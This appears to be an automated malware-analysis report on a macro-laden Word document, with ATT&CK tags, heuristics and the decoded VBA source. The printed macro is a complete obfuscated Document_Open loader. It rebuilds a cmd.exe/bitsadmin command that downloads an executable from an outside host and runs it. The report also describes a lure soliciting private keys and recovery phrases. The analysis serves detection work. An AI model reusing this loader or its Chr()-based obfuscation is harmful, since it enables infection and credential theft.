Verdict: MALICIOUS
Risk Score: 210

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample contains obfuscated VBA macros designed to execute a command. The Document_Open macro is triggered upon opening, and it constructs and executes a command line using cmd.exe and bitsadmin to download a second-stage payload from 'http://siski.ml/pollyana.exe' and save it as '%appdata%\123.exe'. The document body itself is a lure, masquerading as a security evaluation to solicit sensitive information like private keys or recovery phrases, aligning with social engineering tactics.
Heuristics (6)

- Recovery secret / private key request (critical, SE_SECRET_RECOVERY_LURE): Document requests recovery phrases, private keys, backup codes, or saved passwords. Requests for these secrets in a document are high-risk.
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code.
- Potential Shell call in VBA (critical, OLE_VBA_SHELL): Potential Shell call in VBA. Matched line in script: `Shell myfletch`
- Obfuscated auto-exec VBA loader (critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER): Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source. Matched line in script: `Shell myfletch`
- Document_Open macro (low, OLE_VBA_DOCOPEN): Document_Open macro. Matched line in script: `Private Sub Document_Open()`
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1906 bytes |

SHA-256 (macros.bas): f086414f3a33c84f65472b0bc4a6a1ed00927bffe7be04a4200b2ad406fbc186

Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Auto-exec entry point: runs as soon as the document is opened (OLE_VBA_DOCOPEN).
Private Sub Document_Open()
MsgBox "This Document is confidential. Please do not copy or resend"
Dim myfletch, a1, a2, a3, a4 As String
' The command line is rebuilt from Chr() calls so that no cmd.exe, bitsadmin or URL
' string appears literally in the macro source (OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER).
a1 = Chr(99) + Chr(109) + Chr(100) + Chr(46) + Chr(101) + Chr(120) + Chr(101) + Chr(32) + Chr(47) + Chr(99)
a2 = Chr(32) + Chr(98) + Chr(105) + Chr(116) + Chr(115) + Chr(97) + Chr(100) + Chr(109) + Chr(105) + Chr(110) + Chr(32) + Chr(47) + Chr(116) + Chr(114) + Chr(97) + Chr(110) + Chr(115) + Chr(102) + Chr(101) + Chr(114) + Chr(32) + Chr(109) + Chr(121) + Chr(106) + Chr(111) + Chr(98) + Chr(32) + Chr(47) + Chr(100) + Chr(111) + Chr(119) + Chr(110) + Chr(108) + Chr(111) + Chr(97) + Chr(100) + Chr(32) + Chr(47) + Chr(112) + Chr(114) + Chr(105) + Chr(111) + Chr(114) + Chr(105) + Chr(116) + Chr(121) + Chr(32) + Chr(110) + Chr(111) + Chr(114) + Chr(109) + Chr(97) + Chr(108)
a3 = Chr(32) + Chr(104) + Chr(116) + Chr(116) + Chr(112) + Chr(58) + Chr(47) + Chr(47) + Chr(115) + Chr(105) + Chr(115) + Chr(107) + Chr(105) + Chr(46) + Chr(109) + Chr(108) + Chr(47) + Chr(112) + Chr(111) + Chr(108) + Chr(121) + Chr(97) + Chr(110) + Chr(97) + Chr(46) + Chr(101) + Chr(120) + Chr(101)
a4 = Chr(32) + Chr(37) + Chr(97) + Chr(112) + Chr(112) + Chr(100) + Chr(97) + Chr(116) + Chr(97) + Chr(37) + Chr(92) + Chr(49) + Chr(50) + Chr(51) + Chr(46) + Chr(101) + Chr(120) + Chr(101) + Chr(38) + Chr(115) + Chr(116) + Chr(97) + Chr(114) + Chr(116) + Chr(32) + Chr(37) + Chr(97) + Chr(112) + Chr(112) + Chr(100) + Chr(97) + Chr(116) + Chr(97) + Chr(37) + Chr(92) + Chr(49) + Chr(50) + Chr(51) + Chr(46) + Chr(101) + Chr(120) + Chr(101)
myfletch = a1 + a2 + a3 + a4
' Execution sink flagged by OLE_VBA_SHELL: the decoded command line is handed to Shell.
Shell myfletch
End Sub
```